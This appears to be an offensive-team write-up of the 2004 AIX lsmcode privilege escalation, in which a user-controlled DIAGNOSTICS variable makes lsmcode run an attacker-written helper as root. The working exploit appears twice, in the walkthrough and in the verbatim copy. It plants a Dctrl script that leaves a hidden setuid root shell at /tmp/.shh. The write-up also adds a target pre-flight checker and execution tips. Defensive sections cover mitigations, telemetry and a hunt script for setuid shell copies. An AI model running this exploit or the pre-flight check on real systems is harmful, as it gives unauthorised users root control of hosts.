AIX 'lsmcode' Privilege Escalation: A Deep Dive for Offensive Teams

What this paper is
This paper documents a local privilege escalation in IBM AIX. The Exploit-DB entry lists the affected range as AIX 4.3 and 5.1, below 5.3. A local user with an ordinary account can obtain root by abusing the lsmcode command, which executes a helper program found through an environment variable that the caller controls.
Simple technical breakdown
The flaw is in how lsmcode locates the helpers it runs, not in a configuration file. lsmcode is a privileged diagnostic command that resolves the helper it invokes relative to the directory named in the DIAGNOSTICS environment variable, and that variable is inherited from the unprivileged caller. Exporting DIAGNOSTICS=/tmp/aap makes lsmcode execute /tmp/aap/bin/Dctrl, a script the attacker wrote, with lsmcode's own privileges. The payload in that script copies /bin/sh, changes the copy's owner to root and sets the setuid bit; the chown can only succeed because the script is already running as root.
Complete code and payload walkthrough
The provided exploit code is a shell script that sets up the necessary environment and then executes the vulnerable command.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

Let's break down each part:
mkdirhier /tmp/aap/bin: Creates /tmp/aap/bin and any missing parent directories (mkdirhier is the X11 utility equivalent to mkdir -p). This is where the attacker stages the malicious helper.
  Practical purpose: establishes the directory layout lsmcode expects beneath $DIAGNOSTICS.

export DIAGNOSTICS=/tmp/aap: Sets DIAGNOSTICS to /tmp/aap and exports it, so that lsmcode, a child process of the attacker's shell, inherits it. lsmcode looks for its diagnostic helpers under the directory named by this variable.
  Practical purpose: redirects lsmcode's helper lookup into an attacker-controlled directory.

cat > /tmp/aap/bin/Dctrl << EOF ... EOF: Writes a file named Dctrl into /tmp/aap/bin. Its contents are a three-line shell script:
  #!/bin/sh: the script runs under /bin/sh.
  cp /bin/sh /tmp/.shh: copies the system shell to /tmp/.shh (the leading dot keeps it out of a plain ls listing).
  chown root:system /tmp/.shh: makes the copy owned by root, group system. This only succeeds because lsmcode runs Dctrl with root privilege.
  chmod u+s /tmp/.shh: sets the setuid bit. A setuid executable runs with the privileges of its owner (here root), not of the user who starts it. This is the step that turns a one-off code execution inside lsmcode into a reusable root shell.
  Practical purpose: the payload lsmcode will execute; it leaves a setuid root shell behind.

chmod a+x /tmp/aap/bin/Dctrl: Makes Dctrl executable for owner, group and others.
  Practical purpose: lsmcode cannot execute the helper unless the execute bit is set.

lsmcode: The vulnerable command. With DIAGNOSTICS exported, lsmcode looks in the bin subdirectory of that path, finds /tmp/aap/bin/Dctrl and executes it as root.
  Practical purpose: triggers the bug; the payload runs with root privilege.

/tmp/.shh: Once lsmcode has returned, the attacker runs the copy. Because /tmp/.shh is owned by root and has the setuid bit set, the new shell runs with effective uid 0.
  Practical purpose: the attacker's root shell.
Mapping list:
- mkdirhier /tmp/aap/bin: directory setup for exploit staging.
- export DIAGNOSTICS=/tmp/aap: environment variable manipulation to redirect lsmcode.
- cat > /tmp/aap/bin/Dctrl << EOF ... EOF: creation of the malicious script (Dctrl).
  - cp /bin/sh /tmp/.shh: copying the target shell.
  - chown root:system /tmp/.shh: setting ownership to root.
  - chmod u+s /tmp/.shh: setting the setuid bit for privilege escalation.
- chmod a+x /tmp/aap/bin/Dctrl: making the malicious script executable.
- lsmcode: triggering the vulnerable command.
- /tmp/.shh: executing the setuid root shell.
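To make the bug class concrete, here is an added example. It is not code from the original paper and not lsmcode's real source (the paper does not show lsmcode's internals); it models in shell only the behaviour the exploit relies on, a privileged program resolving a helper called Dctrl under the directory named by DIAGNOSTICS, and places a hardened lookup next to it. The default path /usr/lpp/diagnostics is an assumption used for illustration.

```shell
#!/bin/sh
# Added example: a shell model of the lsmcode bug class, not lsmcode itself.
# Both functions resolve a helper called Dctrl under $DIAGNOSTICS/bin; the
# unsafe one trusts the environment, the safe one treats it as attacker input.
# /usr/lpp/diagnostics is an assumed default, used here only for illustration.

DIAG_DEFAULT=/usr/lpp/diagnostics

# Is the directory writable by group or other? Parsed from the ls -ld mode
# string so it works on AIX and Linux alike (chars 6 and 9 are the w bits).
dir_writable_by_others() {
    w_mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$w_mode" in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# Vulnerable pattern: whatever DIAGNOSTICS points at gets executed. Doing
# this from a program that runs as root is exactly the lsmcode bug.
run_dctrl_unsafe() {
    u_dir="${DIAGNOSTICS:-$DIAG_DEFAULT}"
    [ -x "$u_dir/bin/Dctrl" ] || return 2
    "$u_dir/bin/Dctrl"
}

# Hardened pattern: accept only the trusted root, refuse symlinks anywhere in
# the path, refuse a helper directory that others can write to, and run the
# helper with a clean environment so nothing else inherited from the caller
# reaches it.
run_dctrl_safe() {
    s_dir="${DIAGNOSTICS:-$DIAG_DEFAULT}"
    s_helper="$s_dir/bin/Dctrl"
    case "$s_dir" in
        "$DIAG_DEFAULT"|"$DIAG_DEFAULT"/*) ;;
        *) echo "refusing DIAGNOSTICS=$s_dir: outside $DIAG_DEFAULT" >&2; return 1 ;;
    esac
    if [ -L "$s_dir" ] || [ -L "$s_dir/bin" ] || [ -L "$s_helper" ]; then
        echo "refusing $s_helper: symlink in path" >&2
        return 1
    fi
    if dir_writable_by_others "$s_dir/bin"; then
        echo "refusing $s_helper: $s_dir/bin is writable by group/other" >&2
        return 1
    fi
    [ -x "$s_helper" ] || return 2
    env -i PATH=/usr/bin:/bin "$s_helper"
}
```

With DIAGNOSTICS=/tmp/aap, run_dctrl_unsafe executes the attacker's Dctrl while run_dctrl_safe refuses it before any lookup happens. For a real setuid binary the strongest fix is stronger still: ignore the caller's environment for privileged paths entirely, or drop privileges before running any helper.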
Practical details for offensive operations teams
- Required Access Level: Local user access to the target AIX system. No special privileges are needed initially, as the goal is privilege escalation.
- Lab Preconditions:
  - A target AIX system running a vulnerable version (4.3 or 5.1; the affected range is below 5.3).
  - The lsmcode command must be present and executable by the local user.
  - The /tmp directory must be writable by the local user, and mounted so that files there can be executed and the setuid bit is honoured.
  - /bin/sh must exist and be readable, since the payload copies it.
  - The cp, chown, chmod, mkdirhier (or mkdir -p), cat and sh commands must be available; export is a shell builtin.
- Tooling Assumptions: Standard AIX command-line utilities are sufficient. No specialized exploit frameworks are strictly required for this specific exploit, though they could be used to deliver and execute the script.
- Execution Pitfalls:
  - Version mismatch: the exploit is reported not to work on AIX 5.3 and later, where the vulnerability was fixed. Check the level with oslevel before trying it.
  - Permissions: if /tmp is mounted nosuid, the kernel ignores the setuid bit on /tmp/.shh and the final step yields an ordinary unprivileged shell; if it is mounted noexec, neither Dctrl nor /tmp/.shh can be executed at all. If the attacker cannot write to /tmp, another attacker-writable directory that is not mounted with those options is needed, which is less common.
  - lsmcode path: if lsmcode is not in the user's PATH or is not executable by the user, the exploit fails. Locate it first (command -v lsmcode, or which lsmcode).
  - Ordering: the steps are strictly sequential. DIAGNOSTICS must be exported and Dctrl must be executable before lsmcode runs, and lsmcode must have finished before /tmp/.shh is invoked.
  - Antivirus/intrusion detection: rare for local exploits in 2004, but a modern host agent or audit policy may alert on a setuid root shell appearing in /tmp or on lsmcode spawning a script from a temporary directory.
- Telemetry:
  - Creation of the /tmp/aap and /tmp/aap/bin directories.
  - Creation of the /tmp/aap/bin/Dctrl file.
  - Execution of lsmcode with DIAGNOSTICS set in its environment, and lsmcode spawning /tmp/aap/bin/Dctrl.
  - Creation of /tmp/.shh, followed by its ownership change to root:system and the addition of the setuid bit.
  - Execution of /tmp/.shh.
  - A new shell process running with effective uid 0 (root) whose parent is an unprivileged user's shell.
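The pre-flight check below is an added example, not part of the original paper. It verifies the preconditions and pitfalls listed above on the target. It assumes that oslevel prints the base level as a dotted version such as 5.1.0.0 and that the options column of mount output is where nosuid and noexec appear; the parsing functions take their input from arguments or stdin so they can be exercised against constructed lines on any system.

```shell
#!/bin/sh
# Added example, not part of the original paper: a pre-flight check for the
# preconditions and pitfalls listed above. Assumptions: oslevel prints the
# base level as a dotted version such as 5.1.0.0, and the options column of
# mount output is where nosuid/noexec show up. The parsing functions are
# pure so they can be checked against constructed input on any system.

# True (0) when a dotted AIX level is below 5.3, i.e. 4.x, 5.0, 5.1 or 5.2.
level_below_53() {
    lv_maj=${1%%.*}
    lv_rest=${1#*.}
    [ "$lv_rest" = "$1" ] && lv_rest=0        # no dot at all: treat as X.0
    lv_min=${lv_rest%%.*}
    case "$lv_maj$lv_min" in
        ''|*[!0-9]*) return 2 ;;               # not a version string
    esac
    [ "$lv_maj" -lt 5 ] && return 0
    [ "$lv_maj" -eq 5 ] && [ "$lv_min" -lt 3 ] && return 0
    return 1
}

# Does a comma-separated mount options string contain the given option?
mount_has_opt() {
    case ",$1," in *",$2,"*) return 0 ;; esac
    return 1
}

# Read mount(1) output on stdin and print the options column for a mount
# point. AIX prints "node mounted mounted-over vfs date options"; Linux prints
# "dev on mp type fs (opts)". Both reduce to the bare comma list.
parse_mount_opts() {
    awk -v mp="$1" '
        { for (i = 1; i <= NF; i++) if ($i == mp) { o = $NF; gsub(/[()]/, "", o); print o; exit } }'
}

mount_opts_for() {
    mount 2>/dev/null | parse_mount_opts "$1"
}

# Run on the target: exit 0 only if every precondition looks satisfied.
preflight() {
    pf_rc=0
    if pf_level=$(oslevel 2>/dev/null); then
        if level_below_53 "$pf_level"; then
            echo "oslevel $pf_level: in the affected range"
        else
            echo "oslevel $pf_level: 5.3 or later, not affected"; pf_rc=1
        fi
    else
        echo "oslevel not found: not an AIX host?"; return 1
    fi
    if pf_bin=$(command -v lsmcode 2>/dev/null) && [ -x "$pf_bin" ]; then
        echo "lsmcode: $pf_bin"
    else
        echo "lsmcode not found or not executable"; pf_rc=1
    fi
    if [ -w /tmp ]; then echo "/tmp writable"; else echo "/tmp not writable"; pf_rc=1; fi
    pf_opts=$(mount_opts_for /tmp)
    for pf_o in nosuid noexec; do
        if mount_has_opt "$pf_opts" "$pf_o"; then
            echo "/tmp mounted $pf_o: exploit chain will fail"; pf_rc=1
        fi
    done
    return $pf_rc
}

case "${1:-}" in run) preflight ;; esac
```

Invoke it as sh preflight.sh run on the target; a non-zero exit means at least one precondition is not met and the reason is printed.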
Where this was used and when
This exploit was published in December 2004. At that time, AIX was a prevalent operating system in enterprise environments, particularly for servers and mission-critical applications. Exploits like this would have been relevant for attackers targeting organizations using these systems to gain deeper access and control. It's difficult to pinpoint specific real-world incidents without further reporting, but it represents a common class of local privilege escalation vulnerabilities found in the early to mid-2000s.
Defensive lessons for modern teams
- Patch Management: The most direct defense is to keep operating systems updated. AIX 5.3 and later are not vulnerable, and AIX 4.3 and 5.1 are long out of support.
- Principle of Least Privilege: Users should not have unnecessary permissions. If a user does not need to execute lsmcode or write to /tmp, restrict those rights.
- Filesystem Mount Options: Mounting /tmp with nosuid and noexec defeats many local privilege escalations that stage binaries or setuid programs in temporary directories. Here nosuid makes the kernel ignore the setuid bit on /tmp/.shh, and noexec stops Dctrl and /tmp/.shh from being executed at all.
- Auditing and Monitoring: Log and alert on suspicious file creations, ownership and permission changes, and the execution of unexpected binaries, especially ones that acquire the setuid bit. lsmcode running with DIAGNOSTICS set to a user-writable directory, or spawning a child from /tmp, is a strong indicator.
- Vulnerability Scanning: Regularly scan systems for known vulnerabilities, including old ones that can still be present on unpatched or forgotten hosts.
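As an added example, not from the paper, here is a hunt for the artefact this exploit leaves behind: a setuid copy of a shell sitting in a world-writable directory. The list of shells it compares against is an assumption; extend it with the interpreters installed on the host.

```shell
#!/bin/sh
# Added example, not part of the original paper: hunt for setuid copies of a
# shell in the usual drop zones. The SHELLS list is an assumption; add any
# other interpreters installed on the host.

SHELLS="/bin/sh /bin/ksh /bin/bsh /bin/csh /usr/bin/sh /usr/bin/ksh"

# Every regular file with the setuid bit under the given directories.
find_setuid_under() {
    find "$@" -type f -perm -4000 2>/dev/null
}

# Owner name of a file, from ls -l (third column); works on AIX and Linux.
file_owner() {
    ls -ld "$1" 2>/dev/null | awk '{ print $3 }'
}

# Print "path<TAB>owner<TAB>shell" for each setuid file under the given
# directories that is byte-for-byte identical to a known shell binary.
setuid_shell_copies() {
    find_setuid_under "$@" | while IFS= read -r sc_file; do
        for sc_sh in $SHELLS; do
            [ -f "$sc_sh" ] || continue
            if cmp -s "$sc_file" "$sc_sh"; then
                printf '%s\t%s\t%s\n' "$sc_file" "$(file_owner "$sc_file")" "$sc_sh"
                break
            fi
        done
    done
}

# Scan /tmp and /var/tmp; exit 1 if any hit is owned by root, which is the
# state this exploit leaves /tmp/.shh in.
hunt() {
    h_hits=$(setuid_shell_copies /tmp /var/tmp)
    if [ -z "$h_hits" ]; then
        echo "no setuid shell copies found"
        return 0
    fi
    printf '%s\n' "$h_hits"
    printf '%s\n' "$h_hits" | awk -F'\t' '$2 == "root" { r++ } END { exit r ? 1 : 0 }'
}

case "${1:-}" in run) hunt ;; esac
```

Run it as sh hunt.sh run from cron or a host agent. Comparing file contents rather than names catches the copy however it is named (.shh here), and a root-owned hit in /tmp has no legitimate explanation on a normal host.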
ASCII visual (if applicable)
This exploit doesn't lend itself to a complex architectural diagram. It's a direct manipulation of a command's behavior through environment variables and file system manipulation.
+-------------------+       +-------------------------+       +-----------------+
| Attacker (local)  | ----> | AIX system (vulnerable) | ----> | Root privileges |
+-------------------+       +-------------------------+       +-----------------+
        |                              |
        | 1. Create /tmp/aap/bin and   |
        |    the Dctrl script          |
        |                              |
        | 2. export DIAGNOSTICS=       |
        |    /tmp/aap                  |
        |                              |
        | 3. Run lsmcode ------------> | lsmcode executes Dctrl as root:
        |                              | cp /bin/sh /tmp/.shh; chown root; chmod u+s
        |                              |
        | 4. Run /tmp/.shh ----------> | setuid root shell (effective uid 0)
        v                              v

Source references
- PAPER ID: 701
- PAPER TITLE: AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation
- AUTHOR: cees-bart
- PUBLISHED: 2004-12-21
- KEYWORDS: AIX,local
- PAPER URL: https://www.exploit-db.com/papers/701
- RAW URL: https://www.exploit-db.com/raw/701
Original Exploit-DB Content (Verbatim)
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
# milw0rm.com [2004-12-21]